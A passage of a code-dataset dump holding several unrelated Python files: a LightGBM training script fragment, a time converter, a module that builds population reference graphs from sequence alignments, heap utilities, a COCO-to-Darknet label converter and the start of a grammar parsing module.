f\"/{save_suffix}_train\" , glob=globals() )\n\n return clf, dfstat, clf_features\n\n\n\n\n\"\"\"\nclf = clf_h\ncols_train = cols_h_train\n\n\n\n\n\n####################################################################################################\n############ Train h #########################################################################\ndf = df[ -df.n_user.isnull( )]\ndf = df[ -df.travel_gms_total_3mth.isnull( )]\ndf = df[ -df.travel_gms_total_6mth.isnull( )]\ndf = df[ -df.travel_gms_total_1mth_area_log_area.isnull() ]\n\n\n\n\n\ncols_h = list( df.columns)\ncols_h_train = col_remove(cols_h, [ \"date\", \"y\", \"zip3\", \"shi_int\", 'travel_gms_total_3yr_h_log',\n 'travel_cnt_total_3yr_h_log',\n \n 'y2', 'y3', 'dateint', 'ypred_area', 'zipcode', 'C_TIKU_ID', 'y2',\n 'travel_cnt_total_3yr', 'travel_gms_total_1yr_total', \n 'C_TIKU_ID', 'h_name',\n 'zipcode',\n 'cat1', 
'area_name', 'ken', 'shi', 'size', 'cat2',\n 'h_gms_score', 'amt_sum', 'amt_max', 'year', 'h_id',\n \n 'gms_3yr_diff', 'cnt_3yr_diff', 'gms_3yr_diff_area',\n 'travel_gms_total_3yr',\n \n \n \n 'travel_cnt_total_3yr_area_log_area', 'travel_gms_total_3yr_area_log_area',\n 'travel_cnt_total_3yr_log', 'travel_gms_total_3yr_log',\n 'gms_6mth_yoy', 'ken_int_area',\n 'shi_int_area', 'ypred',\n 'gms_1yr_yoy',\n 'gms_3mth_yoy'\n \n ] )\nprint(len( cols_h_train))\n \ncol_target = 'y'\n\ndatec = 201801\ndatemin = 201706\ndatemax = 201905\n\n\n\n#### Check\nfor x in cols_h_train :\n print(x, df[ (df.date >= datemin ) & (df.date < datemax ) ][x].isnull().sum() )\ndf[ (df.date >= datemin ) & (df.date < datemax ) ]['y'].hist()\n\n\n\n\n\n\n###### Details\nii = 0\ndirmodel = \"C:/Users/kevin.noel/Box/Data Science Department/Personal/znono/a/model/h/\"\ndirsession = dirmodel + \"/session/\"\n\n\n#### Eval Dataset \nX_test0 = df[ (df.date >= datec ) & (df.date < datemax ) ][ cols_h_train].values\ny_test0 = df[ (df.date >= datec ) & (df.date < datemax ) ][ col_target].values\nprint(X_test0.shape)\n\n\n\ndfeval = None\n\n\nii = ii + 1\nclf_h, dfstat_h,clf_features_h = model_fit( df[ (df.date >= datemin) & (df.date <= datemax ) ], \n cols_train = cols_h_train, col_target = \"y\",\n coldate = 'date',\n # dfeval = df[ (df.date > 201806) & (df.date < 201905 ) ],\n \n save_suffix = \"area_gms_202004_OK_v\"+ str(ii) , \n dirmodel = dirmodel ,\n \n dosave = 1 ,\n test_size = 0.40,\n\n modelname = \"LGBMClassifier\",\n \n num_leaves= 300, \n max_depth=40, \n \n learning_rate=0.01, \n num_iterations= 200,\n max_bin = 800, \n\n n_estimators= 300,\n boosting_type='gbdt', \n \n bagging_fraction=0.3,\n \n subsample_for_bin=200000, objective=\"binary\",\n class_weight=\"balanced\", min_split_gain=0.0, min_child_weight=0.001,\n min_child_samples=5, subsample=1.0, subsample_freq=0,\n colsample_bytree=1.0, reg_alpha=0.0, reg_lambda=0.0,\n n_jobs=-1, silent=False, importance_type='split' )\n\n\n\n\n##### Evaluation Over a period :\ndf[\"ypred\"] = clf_h.predict( df[ cols_h_train ].values )\ndf[\"ypred_proba\"] = clf_h.predict_proba( df[ cols_h_train ] )[:,1]\n\n\ndfeval2 = df[ (df.date >= datec ) & (df.date < datemax ) ]\ndfstat = metric_accuracy_check(dfeval2, col_target= col_target, ypred = col_target + \"pred\",\n ypred_proba = col_target + \"pred_proba\", coldate = 'date' )\n\n\ndfstat.to_csv( dirmodel + f\"/clf_stats.csv\" )\n\n\n\n\n#####################################\ngluonts_model_eval( clf_h, df[ (df.date >= datec ) & (df.date < datemax ) ],\n colX = cols_h_train, coly= col_target, test_size=0.99, istrain = 0,\n use_eval= 1 )\n\n\nprint(len(df[ (df.date >= datec ) ]))\ndf.groupby('date').agg({ 'h_id' : 'count' })\ndf.columns\n\n\n\"\"\"\n\n","sub_path":"data/input/tseries_m5/util_eval.py","file_name":"util_eval.py","file_ext":"py","file_size_in_byte":9072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"115181859","text":"#!/usr/bin/env python3\n\ndef to_seconds(hours, minutes, seconds):\n return hours*3600+minutes*60+seconds\n\nprint('Welcome to the time converter')\n\ncont = 'y'\nwhile (cont.lower() == 'y'):\n hours = int(input('Number of hours: '))\n minutes = int(input('Number of minutes: '))\n seconds = int(input('Number of seconds: '))\n\n print('That is {} seconds'.format(to_seconds(hours, minutes, seconds)))\n print()\n cont = input('Do you want to do more conversions? 
[y to continue]')\n\nprint('Bye')\n","sub_path":"python_interacting_with_os/week_four/to_seconds.py","file_name":"to_seconds.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"243255509","text":"import gzip\nimport logging\nimport os\n\nimport numpy as np\nfrom Bio import AlignIO\nfrom Bio.AlignIO import MultipleSeqAlignment\nfrom sklearn.cluster import KMeans\n\nfrom make_prg.utils import remove_duplicates, remove_gaps\n\n\ndef get_interval_seqs(interval_alignment):\n \"\"\"Replace - with nothing, remove seqs containing N or other non-allowed letters\n and duplicate sequences containing RYKMSW, replacing with AGCT alternatives \"\"\"\n allowed_bases = {\"A\", \"C\", \"G\", \"T\", \"R\", \"Y\", \"K\", \"M\", \"S\", \"W\"}\n iupac = {\n \"R\": [\"G\", \"A\"],\n \"Y\": [\"T\", \"C\"],\n \"K\": [\"G\", \"T\"],\n \"M\": [\"A\", \"C\"],\n \"S\": [\"G\", \"C\"],\n \"W\": [\"A\", \"T\"],\n }\n seqs = []\n gapless_seqs = [\n remove_gaps(str(record.seq)).upper() for record in interval_alignment\n ]\n unique_seqs = remove_duplicates(gapless_seqs)\n\n for seq in unique_seqs:\n if allowed_bases.issuperset(seq):\n new_seqs = [seq]\n for letter in iupac.keys():\n letter_seqs = []\n for t in new_seqs:\n if letter in t:\n letter_seqs.append(t.replace(letter, iupac[letter][0]))\n letter_seqs.append(t.replace(letter, iupac[letter][1]))\n else:\n letter_seqs.append(t)\n new_seqs = letter_seqs\n seqs.extend(new_seqs)\n ret_list = list(set(seqs))\n if len(ret_list) == 0:\n logging.warning(\n \"WARNING: Every sequence must have contained an N in this slice - redo sequence curation because this is nonsense\"\n )\n logging.warning(\n \"Sequences were\",\n \" \".join(\n list(\n remove_duplicates(\n [\n remove_gaps(str(record.seq)).upper()\n for record in interval_alignment\n ]\n )\n )\n ),\n )\n logging.warning(\n \"Using these sequences anyway, and should be ignored downstream\"\n )\n seqs = list(\n remove_duplicates(\n [remove_gaps(str(record.seq)).upper() for record in interval_alignment]\n )\n )\n return sorted(list(set(seqs)))\n\n\nclass AlignedSeq(object):\n \"\"\"\n Object based on a set of aligned sequences. 
Note min_match_length must be strictly greater than max_nesting + 1.\n \"\"\"\n\n def __init__(\n self,\n msa_file,\n alignment_format=\"fasta\",\n max_nesting=2,\n nesting_level=1,\n min_match_length=3,\n site=5,\n alignment=None,\n interval=None,\n prg_file=None,\n ):\n self.msa_file = msa_file\n self.alignment_format = alignment_format\n self.max_nesting = max_nesting\n self.nesting_level = nesting_level\n self.min_match_length = min_match_length\n self.site = site\n self.alignment = alignment\n if not self.alignment:\n logging.info(\"Read from MSA file %s\", self.msa_file)\n if \".gz\" in self.msa_file:\n logging.debug(\"MSA is gzipped\")\n handle = gzip.open(self.msa_file, \"rt\")\n self.alignment = AlignIO.read(handle, self.alignment_format)\n handle.close()\n else:\n self.alignment = AlignIO.read(self.msa_file, self.alignment_format)\n self.interval = interval\n self.num_seqs = len(self.alignment)\n self.consensus = self.get_consensus()\n self.length = len(self.consensus)\n (self.match_intervals, self.non_match_intervals) = self.get_match_intervals\n self.check_nonmatch_intervals()\n self.all_intervals = self.match_intervals + self.non_match_intervals\n logging.info(\"Non match intervals: %s\", self.non_match_intervals)\n self.all_intervals.sort()\n if self.nesting_level == 1:\n self.length_match_intervals = 0\n for interval in self.match_intervals:\n self.length_match_intervals += interval[1] - interval[0] + 1\n self.prop_in_match_intervals = self.length_match_intervals / float(\n self.length\n )\n\n # properties for stats\n self.subAlignedSeqs = {}\n\n # make prg\n self.delim_char = \" \"\n self.prg = \"\"\n if prg_file:\n logging.info(\n \"Reading from a PRG file which already exists. To regenerate, delete it.\"\n )\n with open(prg_file, \"r\") as f:\n self.prg = f.read()\n else:\n self.prg = self.get_prg()\n self.kmer_dict = {}\n\n def get_consensus(self):\n \"\"\"Given a set of aligment records from AlignIO, creates\n a consensus string.\n Lower and upper case are equivalent\n Non AGCT symbols RYKMSW result in non-consensus and are substituted in graph\n N results in consensus at that position unless they are all N.\"\"\"\n first_string = str(self.alignment[0].seq)\n consensus_string = \"\"\n for i, letter in enumerate(first_string):\n consensus = True\n for record in self.alignment:\n if (record.seq[i].upper() != \"N\" and letter.upper() != \"N\") and (\n record.seq[i].upper() != letter.upper()\n or record.seq[i].upper() in [\"R\", \"Y\", \"K\", \"M\", \"S\", \"W\"]\n ):\n consensus = False\n break\n if letter.upper() == \"N\" and record.seq[i].upper() != \"N\":\n letter = record.seq[i].upper()\n if consensus and letter.upper() != \"N\":\n consensus_string += letter\n else:\n consensus_string += \"*\"\n assert len(first_string) == len(consensus_string)\n return consensus_string\n\n @property\n def get_match_intervals(self):\n \"\"\"Return a list of intervals in which we have\n consensus sequence longer than min_match_length, and\n a list of the non-match intervals left.\"\"\"\n match_intervals = []\n non_match_intervals = []\n match_count = 0\n match_start = 0\n non_match_start = 0\n\n logging.debug(\"consensus: %s\" % self.consensus)\n if len(remove_gaps(self.consensus)) < self.min_match_length:\n # It makes no sense to classify a fully consensus sequence as\n # a non-match just because it is too short.\n if \"*\" in self.consensus:\n interval_alignment = self.alignment[:, 0 : self.length]\n interval_seqs = get_interval_seqs(interval_alignment)\n if len(interval_seqs) > 1:\n 
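# added note: get_interval_seqs expands IUPAC codes (RYKMSW) into A/C/G/T alternatives, so even a short all-consensus slice can yield several distinct sequences; only then is it treated as a non-match (variant) interval\n                    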
logging.debug(\n \"add short non-match whole interval [%d,%d]\"\n % (0, self.length - 1)\n )\n non_match_intervals.append([0, self.length - 1])\n else:\n logging.debug(\n \"add short match whole interval [%d,%d]\" % (0, self.length - 1)\n )\n match_intervals.append([0, self.length - 1])\n else:\n match_intervals.append([0, self.length - 1])\n logging.debug(\n \"add short match whole interval [%d,%d]\" % (0, self.length - 1)\n )\n else:\n for i in range(self.length):\n letter = self.consensus[i]\n if letter != \"*\":\n # In a match region.\n if match_count == 0:\n match_start = i\n match_count += 1\n elif match_count > 0:\n # Have reached a non-match. Check if previous match string is long enough to add to match_regions\n match_string = remove_gaps(\n self.consensus[match_start : match_start + match_count]\n )\n match_len = len(match_string)\n logging.debug(\"have match string %s\" % match_string)\n\n if match_len >= self.min_match_length:\n # if the non_match sequences in the interval are really the same, add a match interval\n interval_alignment = self.alignment[\n :, non_match_start : match_start + 1\n ]\n interval_seqs = get_interval_seqs(interval_alignment)\n if non_match_start < match_start and len(interval_seqs) > 1:\n non_match_intervals.append(\n [non_match_start, match_start - 1]\n )\n logging.debug(\n \"add non-match interval as have alts [%d,%d]\"\n % (non_match_start, match_start - 1)\n )\n elif non_match_start < match_start:\n match_intervals.append([non_match_start, match_start - 1])\n logging.debug(\n \"add match interval as only one seq [%d,%d]\"\n % (non_match_start, match_start - 1)\n )\n match_intervals.append(\n [match_start, match_start + match_count - 1]\n )\n logging.debug(\n \"add match interval to complete step [%d,%d]\"\n % (match_start, match_start + match_count - 1)\n )\n non_match_start = i\n match_count = 0\n match_start = non_match_start\n\n # At end add last intervals\n match_string = remove_gaps(\n self.consensus[match_start : match_start + match_count]\n )\n match_len = len(match_string)\n logging.debug(\"at end have match string %s\" % match_string)\n if 0 < match_len < self.min_match_length:\n logging.debug(\n \"have short match region at end, so include it in non-match-region before - \"\n \"match count was %d\" % match_count\n )\n match_count = 0\n match_start = non_match_start\n logging.debug(\"match count is now %d\" % match_count)\n\n if match_count > 0:\n interval_alignment = self.alignment[\n :, non_match_start : match_start + 1\n ]\n else:\n interval_alignment = self.alignment[:, non_match_start : self.length]\n interval_seqs = get_interval_seqs(interval_alignment)\n if len(interval_seqs) == 1:\n match_intervals.append([non_match_start, self.length - 1])\n logging.debug(\n \"add match interval at end as only one seq [%d,%d]\"\n % (non_match_start, self.length - 1)\n )\n elif len(interval_seqs) > 1 and non_match_start < match_start:\n non_match_intervals.append([non_match_start, match_start - 1])\n logging.debug(\n \"add non-match interval at end as have alts [%d,%d]\"\n % (non_match_start, match_start - 1)\n )\n match_intervals.append([match_start, self.length - 1])\n logging.debug(\n \"add match interval at end [%d,%d]\" % (match_start, self.length - 1)\n )\n else:\n non_match_intervals.append([non_match_start, self.length - 1])\n logging.debug(\n \"add only non-match interval at end as have alts [%d,%d]\"\n % (non_match_start, self.length - 1)\n )\n\n # check all stretches of consensus are in an interval, and intervals don't overlap\n for i in 
range(self.length):\n count_match = 0\n for interval in match_intervals:\n if interval[0] <= i <= interval[1]:\n count_match += 1\n count_non_match = 0\n for interval in non_match_intervals:\n if interval[0] <= i <= interval[1]:\n count_non_match += 1\n\n assert count_match | count_non_match, (\n \"Failed to correctly identify match intervals: position %d \"\n \"appeared in both/neither match and non-match intervals\" % i\n )\n assert count_match + count_non_match == 1, (\n \"Failed to correctly identify match intervals: position \"\n \"%d appeared in %d intervals\" % (i, count_match + count_non_match)\n )\n\n return match_intervals, non_match_intervals\n\n def check_nonmatch_intervals(self):\n \"\"\"Goes through non-match intervals and makes sure there is more than one sequence there, else makes it a match\n interval.\"\"\"\n for i in reversed(range(len(self.non_match_intervals))):\n interval = self.non_match_intervals[i]\n interval_alignment = self.alignment[:, interval[0] : interval[1] + 1]\n interval_seqs = get_interval_seqs(interval_alignment)\n if len(interval_seqs) < 2:\n self.match_intervals.append(self.non_match_intervals[i])\n self.non_match_intervals.pop(i)\n self.match_intervals.sort()\n\n def kmeans_cluster_seqs_in_interval(\n self, interval\n ): # , kmer_size=self.min_match_length):\n \"\"\"Divide sequences in interval into subgroups of similar\n sequences. Return a list of lists of ids.\"\"\"\n if interval[1] - interval[0] <= self.min_match_length:\n logging.info(\"Small variation site in interval %s \\n\", interval)\n logging.debug(\n \"interval[1] - interval[0] <= self.min_match_length: %d <= %d\",\n interval[1] - interval[0],\n self.min_match_length,\n )\n interval_alignment = self.alignment[:, interval[0] : interval[1] + 1]\n interval_seqs = get_interval_seqs(interval_alignment)\n assert len(interval_seqs) == len(\n list(remove_duplicates(interval_seqs))\n ), \"should not have duplicate alternative allele sequences\"\n return_id_lists = [\n [\n record.id\n for record in self.alignment\n if remove_gaps(str(record.seq[interval[0] : interval[1] + 1]))\n == seq\n ]\n for seq in interval_seqs\n ]\n else:\n logging.debug(\n \"Get kmeans partition of interval [%d, %d]\", interval[0], interval[1]\n )\n interval_alignment = self.alignment[:, interval[0] : interval[1] + 1]\n interval_seq_dict = {}\n small_interval_seq_dict = {}\n seq_dict_keys = []\n\n for record in interval_alignment:\n seq = remove_gaps(str(record.seq))\n if seq in list(interval_seq_dict.keys()):\n interval_seq_dict[seq].append(record.id)\n elif seq in list(small_interval_seq_dict.keys()):\n small_interval_seq_dict[seq].append(record.id)\n elif len(seq) >= self.min_match_length:\n interval_seq_dict[seq] = [record.id]\n seq_dict_keys.append(seq)\n else:\n small_interval_seq_dict[seq] = [record.id]\n seq_dict_keys.append(seq)\n\n assert len(seq_dict_keys) == len(\n list(remove_duplicates(seq_dict_keys))\n ), \"error, have duplicate dictionary keys\"\n assert (\n len(\n [\n key\n for key in list(interval_seq_dict.keys())\n if key in list(small_interval_seq_dict.keys())\n ]\n )\n == 0\n ), \"error, should have no overlap of keys\"\n assert (\n len(\n [\n key\n for key in list(small_interval_seq_dict.keys())\n if key in list(interval_seq_dict.keys())\n ]\n )\n == 0\n ), \"error, should have no overlap of keys\"\n\n logging.debug(\n \"Add classes corresponding to %d small sequences\"\n % len(list(small_interval_seq_dict.keys()))\n )\n\n logging.debug(\n \"Now add classes corresponding to %d longer sequences\"\n % 
len(list(interval_seq_dict.keys()))\n )\n interval_seqs = list(interval_seq_dict.keys())\n big_return_id_lists = []\n if len(interval_seqs) > 1:\n # first transform sequences into kmer occurance vectors using a dict\n logging.debug(\"First transform sequences into kmer occurance vectors\")\n\n # make dict based on number of kmers in all sequences\n self.kmer_dict = {}\n n = 0\n for j, seq in enumerate(interval_seqs):\n for i in range(len(seq) - self.min_match_length + 1):\n if seq not in list(self.kmer_dict.keys()):\n self.kmer_dict[seq[i : i + self.min_match_length]] = n\n n += 1\n logging.debug(\"These vectors have length %d\" % n)\n\n # transform to vectors using dict\n seq_kmer_counts = np.zeros(shape=(len(interval_seqs), n))\n for j, seq in enumerate(interval_seqs):\n counts = np.zeros(n)\n for i in range(len(seq) - self.min_match_length + 1):\n counts[self.kmer_dict[seq[i : i + self.min_match_length]]] += 1\n seq_kmer_counts[j] = counts\n\n # cluster sequences using kmeans\n logging.debug(\"Now cluster:\")\n kmeans = KMeans(n_clusters=1, random_state=2).fit(seq_kmer_counts)\n pre_cluster_inertia = kmeans.inertia_\n\n if pre_cluster_inertia == 0:\n logging.debug(\"pre_cluster_intertia is 0!\")\n for key in list(interval_seq_dict.keys()):\n logging.debug(\n \"seq: %s, num_seqs with this seq: %d\",\n key,\n len(interval_seq_dict[key]),\n )\n\n cluster_inertia = pre_cluster_inertia\n number_of_clusters = 1\n logging.debug(\n \"number of clusters: %d, inertia: %f\",\n number_of_clusters,\n cluster_inertia,\n )\n while (\n cluster_inertia > 0\n and cluster_inertia > pre_cluster_inertia / 2\n and number_of_clusters <= len(interval_seqs)\n ):\n number_of_clusters += 1\n kmeans = KMeans(n_clusters=number_of_clusters, random_state=2).fit(\n seq_kmer_counts\n )\n cluster_inertia = kmeans.inertia_\n logging.debug(\n \"number of clusters: %d, inertia: %f\",\n number_of_clusters,\n cluster_inertia,\n )\n\n # now extract the equivalence class details from this partition and return\n logging.debug(\"Extract equivalence classes from this partition\")\n if pre_cluster_inertia > 0:\n equiv_class_ids = list(kmeans.predict(seq_kmer_counts))\n for i in range(max(equiv_class_ids) + 1):\n big_return_id_lists.append([])\n for i, val in enumerate(equiv_class_ids):\n big_return_id_lists[val].extend(\n interval_seq_dict[interval_seqs[i]]\n )\n else:\n logging.debug(\"default to not clustering\")\n big_return_id_lists = [\n interval_seq_dict[key] for key in interval_seq_dict.keys()\n ]\n elif len(interval_seqs) == 1:\n big_return_id_lists = [interval_seq_dict[interval_seqs[0]]]\n\n # now merge big and small return_id_lists so as to maintain the order of seqs before\n logging.debug(\"Merge return id lists for the partitions\")\n return_id_lists = []\n added_ids = []\n big_keys = list(interval_seq_dict.keys())\n small_keys = list(small_interval_seq_dict.keys())\n for seq in seq_dict_keys:\n if seq in small_keys:\n logging.debug(\n \"add (small) return ids: %s\" % small_interval_seq_dict[seq]\n )\n return_id_lists.append(small_interval_seq_dict[seq])\n elif seq in big_keys:\n not_added = [\n nid for nid in interval_seq_dict[seq] if nid not in added_ids\n ]\n if len(not_added) == len(interval_seq_dict[seq]):\n logging.debug(\n \"want to add (big) return ids: %s\" % interval_seq_dict[seq]\n )\n for i in range(len(big_return_id_lists)):\n if interval_seq_dict[seq][0] in big_return_id_lists[i]:\n logging.debug(\n \"add (big) return ids %d: %s\"\n % (i, big_return_id_lists[i])\n )\n 
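# added note: the first member of a kmeans cluster encountered here pulls in the whole cluster at once; added_ids then keeps later members of the same cluster from re-adding it\n                                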
return_id_lists.append(big_return_id_lists[i])\n added_ids.extend(return_id_lists[-1])\n break\n else:\n assert (\n len(not_added) == 0\n ), \"Equivalent sequences should be in same part of partition and are not\"\n else:\n logging.warning(\n \"Key %s doesn't seem to be in either big keys or small keys\"\n )\n assert len(interval_alignment) == sum(\n [len(i) for i in return_id_lists]\n ), \"I seem to have lost (or gained?) some sequences in the process of clustering\"\n assert (\n len(return_id_lists) > 1\n ), \"should have some alternate alleles, not only one sequence, this is a non-match interval\"\n return return_id_lists\n\n def get_sub_alignment_by_list_id(self, list_of_id, interval=None):\n list_records = [record for record in self.alignment if record.id in list_of_id]\n sub_alignment = MultipleSeqAlignment(list_records)\n if interval:\n sub_alignment = sub_alignment[:, interval[0] : interval[1] + 1]\n return sub_alignment\n\n def get_prg(self):\n prg = \"\"\n # last_char = None\n # skip_char = False\n\n for interval in self.all_intervals:\n if interval in self.match_intervals:\n # WLOG can take first sequence as all same in this interval\n sub_alignment = self.alignment[:, interval[0] : interval[1] + 1]\n seqs = get_interval_seqs(sub_alignment)\n assert len(seqs) > 0\n seq = seqs[0]\n prg += seq\n\n else:\n # Define variant site number and increment for next available\n site_num = self.site\n self.site += 2\n variant_seqs = []\n\n # Define the variant seqs to add\n if (self.nesting_level == self.max_nesting) or (\n interval[1] - interval[0] <= self.min_match_length\n ):\n # Have reached max nesting level, just add all variants in interval.\n logging.debug(\n \"Have reached max nesting level or have a small variant site, so add all variant \"\n \"sequences in interval.\"\n )\n sub_alignment = self.alignment[:, interval[0] : interval[1] + 1]\n logging.debug(\n \"Variant seqs found: %s\"\n % list(\n remove_duplicates(\n [str(record.seq) for record in sub_alignment]\n )\n )\n )\n variant_seqs = get_interval_seqs(sub_alignment)\n logging.debug(\"Which is equivalent to: %s\" % variant_seqs)\n else:\n # divide sequences into subgroups and define prg for each subgroup.\n logging.debug(\n \"Divide sequences into subgroups and define prg for each subgroup.\"\n )\n recur = True\n list_list_id = self.kmeans_cluster_seqs_in_interval(interval)\n list_sub_alignments = [\n self.get_sub_alignment_by_list_id(list_id, interval)\n for list_id in list_list_id\n ]\n num_classes_in_partition = len(list_list_id)\n\n if len(list_sub_alignments) == self.num_seqs:\n logging.debug(\n \"Partition does not group any sequences together, all seqs get unique class in partition\"\n )\n recur = False\n elif interval[0] not in list(self.subAlignedSeqs.keys()):\n self.subAlignedSeqs[interval[0]] = []\n logging.debug(\n \"subAlignedSeqs now has keys: %s\",\n list(self.subAlignedSeqs.keys()),\n )\n else:\n logging.debug(\n \"subAlignedSeqs already had key %d in keys: %s. 
This shouldn't happen.\",\n interval[0],\n list(self.subAlignedSeqs.keys()),\n )\n\n while len(list_sub_alignments) > 0:\n sub_alignment = list_sub_alignments.pop(0)\n sub__aligned_seq = AlignedSeq(\n msa_file=self.msa_file,\n alignment_format=self.alignment_format,\n max_nesting=self.max_nesting,\n nesting_level=self.nesting_level + 1,\n min_match_length=self.min_match_length,\n site=self.site,\n alignment=sub_alignment,\n interval=interval,\n )\n variant_seqs.append(sub__aligned_seq.prg)\n self.site = sub__aligned_seq.site\n\n if recur:\n # logging.debug(\"None not in snp_scores - try to add sub__aligned_seq to list in\n # dictionary\")\n self.subAlignedSeqs[interval[0]].append(sub__aligned_seq)\n # logging.debug(\"Length of subAlignedSeqs[%d] is %d\", interval[0],\n # len(self.subAlignedSeqs[interval[0]]))\n assert num_classes_in_partition == len(variant_seqs), (\n \"I don't seem to have a sub-prg sequence for all parts of the partition - there are %d \"\n \"classes in partition, and %d variant seqs\"\n % (num_classes_in_partition, len(variant_seqs))\n )\n assert len(variant_seqs) > 1, \"Only have one variant seq\"\n\n if len(variant_seqs) != len(list(remove_duplicates(variant_seqs))):\n print(\"variant_seqs: \")\n for s in variant_seqs:\n print(s)\n print(\", \")\n\n assert len(variant_seqs) == len(\n list(remove_duplicates(variant_seqs))\n ), \"have repeat variant seqs\"\n\n # Add the variant seqs to the prg\n prg += \"%s%d%s\" % (\n self.delim_char,\n site_num,\n self.delim_char,\n ) # considered making it so start of prg was not delim_char,\n # but that would defeat the point if it\n while len(variant_seqs) > 1:\n prg += variant_seqs.pop(0)\n prg += \"%s%d%s\" % (self.delim_char, site_num + 1, self.delim_char)\n prg += variant_seqs.pop()\n prg += \"%s%d%s\" % (self.delim_char, site_num, self.delim_char)\n\n return prg\n\n @property\n def max_nesting_level_reached(self):\n max_nesting = []\n if self.subAlignedSeqs == {}:\n logging.debug(\n \"self.subAlignedSeqs == {} at nesting level %d for interval %s\",\n self.nesting_level,\n self.interval,\n )\n max_nesting.append(self.nesting_level)\n else:\n logging.debug(\n \"self.subAlignedSeqs.keys(): %s\", list(self.subAlignedSeqs.keys())\n )\n logging.debug(\n \"self.subAlignedSeqs[self.subAlignedSeqs.keys()[0]]: %s\",\n self.subAlignedSeqs[list(self.subAlignedSeqs.keys())[0]],\n )\n for interval_start in list(self.subAlignedSeqs.keys()):\n logging.debug(\"interval start: %d\", interval_start)\n for subaseq in self.subAlignedSeqs[interval_start]:\n logging.debug(\n \"type of subAlignedSeqs object in list: %s\", type(subaseq)\n )\n recur = subaseq.max_nesting_level_reached\n logging.debug(\n \"recur max level nesting returned: %d, which has type %s\",\n recur,\n type(recur),\n )\n max_nesting.append(recur)\n m = max(max_nesting)\n logging.debug(\"found the max of %s is %d\", max_nesting, m)\n return m\n","sub_path":"make_prg/make_prg_from_msa.py","file_name":"make_prg_from_msa.py","file_ext":"py","file_size_in_byte":30862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"178924057","text":"\"\"\"\nUtilities for using heapq\n\"\"\"\nimport heapq\nimport logging as root_logger\nlogging = root_logger.getLogger(__name__)\n\nclass HeapWrapper:\n \"\"\" Utility to wrap an ordinal with data to use in the heap \"\"\"\n def __init__(self, ordinal, data, desc=None):\n self.ordinal = ordinal\n self.data = data\n self.desc = desc\n\n def __lt__(self, other):\n assert(isinstance(other, 
HeapWrapper))\n return self.ordinal < other.ordinal\n\n def unwrap(self):\n \"\"\" Unwrap the data \"\"\"\n return (self.ordinal, self.data)\n\n def __repr__(self):\n if self.desc is None:\n return \"{} - {}\".format(self.ordinal, repr(self.data))\n else:\n return \"{} - {} : {}\".format(self.ordinal, self.desc, repr(self.data))\n\n\ndef pop_while_same(heap):\n \"\"\" Pop while the head is equal to the first value poppped \"\"\"\n assert(all([isinstance(x, HeapWrapper) for x in heap]))\n first_vert, first_edge = heapq.heappop(heap).unwrap()\n if first_edge is None:\n return (first_vert, [])\n\n collected = (first_vert, [first_edge])\n count = 1\n while bool(heap) and heap[0].ordinal == first_vert:\n data = heapq.heappop(heap).data\n if data is not None:\n collected[1].append(data)\n count += 1\n assert(len(collected[1]) == count)\n return collected\n","sub_path":"cairo_utils/heaputils.py","file_name":"heaputils.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"444919731","text":"import os\nimport json\nfrom os import listdir, getcwd\nfrom os.path import join\n\n# classes in the correct order\nclasses = ['bicycle', 'bus', 'car', 'motorcycle', 'person', 'rider', 'traffic light', 'traffic sign', 'train', 'truck']\n\n#path to json file\npath = '/home/schober/cityscape_dataset/annotations/instancesonly_filtered_gtFine_train.json'\n\n# output folder path\nout_path = '/home/schober/cityscape_dataset/annotations/darknet_labels_train/'\n\n# box form[x,y,w,h]\ndef convert(size, box):\n dw = size[0]\n dh = size[1]\n w = box[2]\n h = box[3]\n x = (box[0] + 0.5 * w)/dw\n y = (box[1] + 0.5 * h)/dh\n w = w / dw\n h = h / dh\n return (x, y, w, h)\n\n\ndef convert_annotation():\n with open(path, 'r') as f:\n data = json.load(f)\n for item in data['images']:\n image_id = item['id']\n file_name = item['file_name']\n width = item['width']\n height = item['height']\n value = filter(lambda item1: item1['image_id'] == image_id, data['annotations'])\n subfolder_list = file_name.split('/')[:-1]\n subfolder = '/'.join(subfolder_list)\n out_folder = os.path.join(out_path, subfolder)\n print(out_folder)\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n outfile = open(path + '%s.txt' % (file_name[:-4]), 'a+')\n for item2 in value:\n category_id = item2['category_id']\n value1 = list(filter(lambda item3: item3['id'] == category_id, data['categories']))\n name = value1[0]['name']\n if name == 'rider':\n name = 'person'\n class_id = classes.index(name)\n box = item2['bbox']\n bb = convert((width, height), box)\n outfile.write(str(class_id) + \" \" + \" \".join([str(a) for a in bb]) + '\\n')\n outfile.close()\n\n\nif __name__ == '__main__':\n convert_annotation()\n","sub_path":"coco_to_darknet.py","file_name":"coco_to_darknet.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"2085997","text":"from grammar import Slot, Grammar, Sentence, NonTerminal, Terminal, Symbol\n\nimport pdb\n\n\n\n############################### Binary Subtree Representation ###############################\n\nBSR = tuple[Slot, int, int, int] #(g:Slot, l:int, k:int, r:int)\n\n\ndef find_roots(start:NonTerminal, Y:set[BSR], length:int) -> set[BSR]:\n \"\"\"Find all BSRs in Y that are roots of the parse tree\n \n Args:\n start (NonTerminal): The start symbol of the grammar\n Y (set[BSR]): The BSR set\n length (int): The length of the input 
